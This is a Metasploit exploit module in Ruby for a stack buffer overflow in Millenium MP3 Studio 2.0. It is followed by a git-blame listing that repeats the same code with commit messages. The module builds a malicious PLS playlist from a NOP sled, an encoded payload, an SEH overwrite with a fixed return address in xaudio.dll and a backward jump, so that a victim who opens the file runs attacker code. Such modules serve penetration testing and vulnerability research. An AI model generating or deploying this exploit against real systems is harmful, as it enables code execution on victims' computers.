metasploit-framework/modules/exploits/windows/fileformat/millenium_mp3_pls.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.
          An attacker must send the file to victim and the victim must open the file.
          Alternatively it may be possible to execute code remotely via an embedded
          PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio.
          This functionality has not been tested in this module.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Molotov ', 'dookie', 'jduck' ],
      'References'     =>
        [
          [ 'OSVDB', '56574' ],
          [ 'EDB', '9618' ],
          [ 'EDB', '10240' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => 'true',
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00\x0a\x0d\x1a",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => 0x10015593 } ], #p/p/r in xaudio.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 30 2009',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ true, 'The file name.',  'msf.pls']),
        ], self.class)
  end

  def exploit

    header = "[playlist]\r\n"
    header << "NumberOfEntries=1\r\n"
    header << "File1=http://"

    sploit = make_nops(4103 - payload.encoded.length)
    sploit << payload.encoded
    sploit << generate_seh_record(target.ret)

    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + (4103+8).to_s).encode_string
    # note, one of the arguments get modified post overflow, so executing stuff below here is risky...

    filepls = header + sploit

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(filepls)

  end

end
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) also some minor cleanups here and there git-svn-id: file:///home/svn/framework3/trunk@8762 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-10 05:58:01 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = GreatRanking`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::FILEFORMAT`
			`include Msf::Exploit::Remote::Seh`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.`
			`An attacker must send the file to victim and the victim must open the file.`
			`Alternatively it may be possible to execute code remotely via an embedded`
			`PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio.`
			`This functionality has not been tested in this module.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'Molotov ', 'dookie', 'jduck' ],`
			`'References' =>`
			`[`
			`[ 'OSVDB', '56574' ],`
			`[ 'EDB', '9618' ],`
			`[ 'EDB', '10240' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`'DisablePayloadHandler' => 'true',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 1000,`
			`'BadChars' => "\x00\x0a\x0d\x1a",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows Universal', { 'Ret' => 0x10015593 } ], #p/p/r in xaudio.dll`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Jul 30 2009',`
			`'DefaultTarget' => 0))`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),`
			`], self.class)`
			`end`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`header = "[playlist]\r\n"`
			`header << "NumberOfEntries=1\r\n"`
			`header << "File1=http://"`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) also some minor cleanups here and there git-svn-id: file:///home/svn/framework3/trunk@8762 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-10 05:58:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sploit = make_nops(4103 - payload.encoded.length)`
			`sploit << payload.encoded`
			`sploit << generate_seh_record(target.ret)`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) also some minor cleanups here and there git-svn-id: file:///home/svn/framework3/trunk@8762 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-10 05:58:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + (4103+8).to_s).encode_string`
			`# note, one of the arguments get modified post overflow, so executing stuff below here is risky...`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`filepls = header + sploit`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Creating '#{datastore['FILENAME']}' file ...")`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`file_create(filepls)`
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`end`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) also some minor cleanups here and there git-svn-id: file:///home/svn/framework3/trunk@8762 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-10 05:58:01 +00:00
add exploit module from dookie git-svn-id: file:///home/svn/framework3/trunk@7856 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-14 21:27:43 +00:00			`end`